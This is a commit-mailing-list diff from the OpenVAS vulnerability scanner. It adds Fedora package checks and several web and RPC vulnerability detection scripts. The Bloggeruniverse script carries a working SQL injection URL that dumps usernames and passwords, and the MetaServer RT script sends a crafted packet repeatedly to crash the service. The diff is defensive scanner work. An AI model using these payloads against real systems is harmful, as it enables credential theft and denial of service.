+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863542);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"cvss_base", value:"6.8");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2011-3627");
+ script_cve_id("CVE-2011-1024", "CVE-2011-1025", "CVE-2011-1081");
+ script_name("Fedora Update for openldap FEDORA-2011-3627");
+ desc = "
+
+ Vulnerability Insight:
+ OpenLDAP is an open source suite of LDAP (Lightweight Directory Access
+ Protocol) applications and development tools. LDAP is a set of
+ protocols for accessing directory services (usually phone book style
+ information, but other information is possible) over the Internet,
+ similar to the way DNS (Domain Name System) information is propagated
+ over the Internet. The openldap package contains configuration files,
+ libraries, and documentation for OpenLDAP.
+
+
+ Affected Software/OS:
+ openldap on Fedora 14
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066251.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of openldap");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC14")
+{
+
+ if(isrpmvuln(pkg:"openldap", rpm:"openldap~2.4.23~10.fc14", rls:"FC14"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_9820_libsoup_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_9820_libsoup_fc14.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_9820_libsoup_fc14.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for libsoup FEDORA-2011-9820
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863546);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_xref(name: "FEDORA", value: "2011-9820");
+ script_cve_id("CVE-2011-2524");
+ script_name("Fedora Update for libsoup FEDORA-2011-9820");
+ desc = "
+
+ Vulnerability Insight:
+ Libsoup is an HTTP library implementation in C. It was originally part
+ of a SOAP (Simple Object Access Protocol) implementation called Soup, but
+ the SOAP and non-SOAP parts have now been split into separate packages.
+
+ libsoup uses the Glib main loop and is designed to work well with GTK
+ applications. This enables GNOME applications to access HTTP servers
+ on the network in a completely asynchronous fashion, very similar to
+ the Gtk+ programming model (a synchronous operation mode is also
+ supported for those who want it).
+
+
+ Affected Software/OS:
+ libsoup on Fedora 14
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066219.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of libsoup");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC14")
+{
+
+ if(isrpmvuln(pkg:"libsoup", rpm:"libsoup~2.32.2~2.fc14", rls:"FC14"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
Modified: trunk/openvas-plugins/scripts/gb_merak_mail_server_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_merak_mail_server_detect.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_merak_mail_server_detect.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -7,6 +7,9 @@
# Authors:
# Chandan S <schandan at secpod.com>
#
+# Updated By: Antu Sanadi <santu at secpod.com> on 2011-09-27
+# Updated to detect the recent versions.
+#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net
#
@@ -27,16 +30,13 @@
if(description)
{
script_id(800096);
- script_version("$Revision: 1.0 $");
+ script_version("$Revision: 1.1$");
script_tag(name:"risk_factor", value:"None");
script_name("Merak Mail Server Web Mail Version Detection");
desc = "
-
Overview: This script will detect the version of Merak Mail Server Web Mail
- on the remote host and sets the KB.
+ on the remote host and sets the KB.";
- Risk factor: None";
-
script_description(desc);
script_summary("Set KB for the version of Merak Mail Server");
script_category(ACT_GATHER_INFO);
@@ -47,54 +47,72 @@
}
+include("cpe.inc");
include("http_func.inc");
-include("cpe.inc");
include("host_details.inc");
## Constant values
SCRIPT_OID = "1.3.6.1.4.1.25623.1.0.800096";
SCRIPT_DESC = "Merak Mail Server Web Mail Version Detection";
-port = 32000;
-banner = get_http_banner(port);
+## Get the default port
+port = get_http_port(default:80);
+if(!port){
+ port = 32000;
+}
-if("IceWarp" >!< banner){
+## Check the port status
+if(!get_port_state(port)){
exit(0);
}
-smtpPort = get_kb_item("Services/smtp");
-if(!smtpPort){
- smtpPort = 25;
+banner = get_http_banner(port);
+if("IceWarp" >!< banner){
+ exit(0);
}
-imapPort = get_kb_item("Services/imap");
-if(!imapPort){
- imapPort = 143;
-}
+version = eregmatch(pattern:"(Merak|IceWarp).?([0-9.]+)", string:banner);
+if(version[2] == NULL)
+{
+ smtpPort = get_kb_item("Services/smtp");
+ if(!smtpPort){
+ smtpPort = 25;
+ }
-popPort = get_kb_item("Services/pop3");
-if(!popPort){
- popPort = 110;
+ imapPort = get_kb_item("Services/imap");
+ if(!imapPort){
+ imapPort = 143;
+ }
+
+ popPort = get_kb_item("Services/pop3");
+ if(!popPort){
+ popPort = 110;
+ }
+
+ foreach port (make_list(smtpPort, imapPort, popPort))
+ {
+ banner = get_kb_item(string("Banner/", port));
+ if(banner =~ "IceWarp|Merak")
+ {
+ version = eregmatch(pattern:"(Merak|IceWarp) ([0-9.]+)", string:banner);
+ if(version[2] != NULL){
+ ver = version[2];
+ }
+ }
+ }
}
+else if(version[2] != NULL){
+ ver = version[2];
+}
-foreach port (make_list(smtpPort, imapPort, popPort))
+if(ver)
{
- banner = get_kb_item(string("Banner/", port));
- if(banner =~ "IceWarp|Merak")
- {
- ver = eregmatch(pattern:"(Merak|IceWarp) ([0-9.]+)", string:banner);
- if(ver[2] != NULL)
- {
- set_kb_item(name:"MerakMailServer/Ver", value:ver[2]);
- security_note(data:"Merak Mail Server Web Mail version " + ver[2] +
+ set_kb_item(name:"MerakMailServer/Ver", value:ver);
+ security_note(data:"Merak Mail Server Web Mail version " + ver +
" was detected on the host");
-
- ## build cpe and store it as host_detail
- cpe = build_cpe(value:ver[2], exp:"^([0-9.]+)", base:"cpe:/a:icewarp:merak_mail_server:");
- if(!isnull(cpe))
- register_host_detail(name:"App", value:cpe, nvt:SCRIPT_OID, desc:SCRIPT_DESC);
-
- }
- exit(0);
+ ## build cpe and store it as host_detail
+ cpe = build_cpe(value:ver, exp:"^([0-9.]+)", base:"cpe:/a:icewarp:merak_mail_server:");
+ if(!isnull(cpe)){
+ register_host_detail(name:"App", value:cpe, nvt:SCRIPT_OID, desc:SCRIPT_DESC);
}
}
Added: trunk/openvas-plugins/scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,106 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_bloggeruniverse_sql_injection_vuln.nasl 17111 2011-09-26 11:29:14 sep $
+#
+# Bloggeruniverse 'editcomments.php' SQL Injection Vulnerability
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902632);
+ script_version("$Revision: 1.0$");
+ script_cve_id("CVE-2009-5090");
+ script_bugtraq_id(33744);
+ script_tag(name:"cvss_base", value:"6.8");
+ script_tag(name:"risk_factor", value:"High");
+ script_name("Bloggeruniverse 'editcomments.php' SQL Injection Vulnerability");
+ desc = "
+ Overview: The host is running Bloggeruniverse and is prone to sql injection
+ vulnerability.
+
+ Vulnerability Insight:
+ The flaw is due to input passed via the 'id' parameter to 'editcomments.php'
+ is not properly sanitised before being used in SQL queries.
+
+ Impact:
+ Successful exploitation will let attackers to manipulate SQL queries by
+ injecting arbitrary SQL code.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ Bloggeruniverse version 2 Beta.
+
+ Fix: No solution or patch is available as on 27th September 2011. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://sourceforge.net/projects/bloggeruniverse/
+
+ References:
+ http://www.exploit-db.com/exploits/8043/
+ http://xforce.iss.net/xforce/xfdb/48697 ";
+
+ script_description(desc);
+ script_copyright("Copyright (c) 2011 SecPod");
+ script_summary("Check if Bloggeruniverse is vulnerable to SQL Injection");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+ exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+ exit(0);
+}
+
+## Check for each possible path
+foreach dir (make_list("/bloggeruniverse", "/blog", "/bg", cgi_dirs()))
+{
+ ## Send and Receive the response
+ sndReq = http_get(item:string(dir, "/index.php"), port:port);
+ rcvRes = http_send_recv(port:port, data:sndReq);
+
+ if("Bloggeruniverse" >< rcvRes && "CopyRight ©" >< rcvRes)
+ {
+ ## Construct the Attack Request
+ url = dir + "/editcomments.php?id=-2%20union%20all%20select%201,2,3,4,5" +
+ ",6,concat(0x4f70656e564153,0x3a,username,0x3a,password,0x3a,0" +
+ "x4f70656e5641532d53),8%20from%20users";
+
+ if(http_vuln_check(port:port, url:url, pattern:">openVAS:(.+):(.+):openVAS"))
+ {
+ security_hole(port);
+ exit(0);
+ }
+ }
+}
Added: trunk/openvas-plugins/scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,90 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl 17461 2011-09-27 10:42:13Z sep $
+#
+# IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902478);
+ script_version("$Revision: 1.0$");
+ script_cve_id("CVE-2011-3579", "CVE-2011-3580");
+ script_bugtraq_id(49753);
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_name("IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability");
+ desc = "
+ Overview: The host is running IceWarp Mail Server and is prone to xml entity
+ injection and information disclosure vulnerability.
+
+ Vulnerability:
+ The flaws are caused due to,
+ - Certain input passed via SOAP messages to 'server/webmail.php' is not
+ properly verified before being used. This can be exploited to disclose the
+ contents of arbitrary files.
+ - An unspecified script, which calls the 'phpinfo()' function, is stored with
+ insecure permissions inside the web root. This can be exploited to gain
+ knowledge of sensitive information.
+
+ Impact:
+ Successful exploitation will let the attacker to gain access to potentially
+ sensitive information, and possibly cause denial-of-service conditions. other
+ attacks may also be possible.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ IceWarp Mail Server 10.3.2 and prior.
+
+ Fix: Upgrade to IceWarp Mail Server 10.3.3 or later,
+ For updates refer, http://www.icewarp.com
+
+ References:
+ http://secunia.com/advisories/46135/
+ http://xforce.iss.net/xforce/xfdb/70026
+ http://xforce.iss.net/xforce/xfdb/70025
+ http://packetstormsecurity.org/files/view/105320/TWSL2011-013.txt ";
+
+ script_description(desc);
+ script_summary("Check for the version of IceWarp Mail Server");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 SecPod");
+ script_family("Web application abuses");
+ script_dependencies("gb_merak_mail_server_detect.nasl");
+ script_require_keys("MerakMailServer/Ver");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from kb
+icewarp = get_kb_item("MerakMailServer/Ver");
+if(!icewarp){
+ exit(0);
+}
+
+## Check for IceWarp Mail Server version < 10.3.3
+if(version_is_less(version:icewarp, test_version:"10.3.3")){
+ security_warning(0);
+}
Modified: trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -64,13 +64,13 @@
script_copyright("Copyright (C) 2011 SecPod");
script_family("Denial of Service");
script_dependencies("find_service.nes");
- script_require_ports(2194);
+ script_require_ports(2189);
exit(0);
}
## Get Default Port
-port = 2194;
+port = 2189;
if(!get_port_state(port)){
exit(0);
}
@@ -82,15 +82,34 @@
}
## Construct Attack Request
-req = crap(data: raw_string(0x80), length:1024);
+req = raw_string( 0xcd, 0xab, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x52, 0x4f, 0x53, 0x43,
+ 0x4f );
## Sending Attack
send(socket:soc, data:req);
+res = recv(socket:soc, length:200);
close(soc);
-## Waiting
-sleep(3);
+## Confirm the application
+if("Metastock" >!< res){
+ exit(0);
+}
+## Send multiple reconnection request
+for(i = 0; i < 5; i++)
+{
+ soc1 = open_sock_tcp(port);
+ if(!soc1){
+ break;
+ }
+
+ send(socket:soc1, data:req);
+ close(soc1);
+ sleep(1);
+}
+
## Open the socket and Check server is dead or alive
soc = open_sock_tcp(port);
if(!soc)
@@ -98,5 +117,4 @@
security_hole(port);
exit(0);
}
-
close(soc);
Added: trunk/openvas-plugins/scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,100 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_tooltalk_rpc_database_server_mult_vuln.nasl 17217 2011-09-23 12:14:17 sep $
+#
+# CDE ToolTalk RPC Database Server Multiple Vulnerabilities
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902477);
+ script_version("$Revision: 1.0$");
+ script_cve_id("CVE-2002-0677", "CVE-2002-0678");
+ script_bugtraq_id(5083, 5082);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_name("CDE ToolTalk RPC Database Server Multiple Vulnerabilities");
+ desc = "
+ Overview: This host is running the CDE ToolTalk Database Server and is
+ prone to the multiple vulnerabilities.
+
+ Vulnerability Insight:
+ Multiple flaws are due to,
+ - An error in the handling symbolic link. The server does not check to ensure
+ that it is not a symbolic link. If an attacker creates a symbolic link on
+ the filesystem with the path/filename of the logfile, transaction data will
+ be written to the destination file as root.
+ - There are no checks to restrict the range of the index value. Consequently,
+ malicious file descriptor values supplied by remote clients may cause
+ writes to occur far beyond the table in memory. The only value written is
+ a NULL word, limiting the consequences.
+
+ Impact:
+ Successful exploitation could allow attackers to remotely deleting arbitrary
+ files and creating arbitrary directory entries. Further, attackers might be
+ able to crash the ToolTalk RPC database server, denying service to legitimate
+ users.
+
+ Impact Level: System/Application
+
+ Affected Software :
+ CDE ToolTalk RPC database server
+
+ Fix: Apply the patch from below link,
+ http://www.kb.cert.org/vuls/id/975403
+
+ References:
+ http://www.kb.cert.org/vuls/id/975403
+ http://www.kb.cert.org/vuls/id/299816
+ http://www.kb.cert.org/vuls/id/AAMN-5B239R
+ http://www.cert.org/advisories/CA-2002-20.html ";
+
+ script_description(desc);
+ script_copyright("Copyright (c) 2011 SecPod,");
+ script_summary("Checks the presence of CDE ToolTalk RPC Database Server");
+ script_category(ACT_GATHER_INFO);
+ script_family("RPC");
+ script_dependencies("secpod_rpc_portmap.nasl");
+ script_require_keys("rpc/portmap");
+ exit(0);
+}
+
+include("misc_func.inc");
+
+if(report_paranoia < 2){
+ exit(0);
+}
+
+RPC_PROG = 100083;
+
+## Get the rpc port, CDE ToolTalk Database Server
+port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_UDP);
+if(port)
+{
+ security_hole(port);
+ exit(0);
+}
+
+port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_TCP);
+if(port){
+ security_hole(port);
+}
More information about the Openvas-commits
mailing list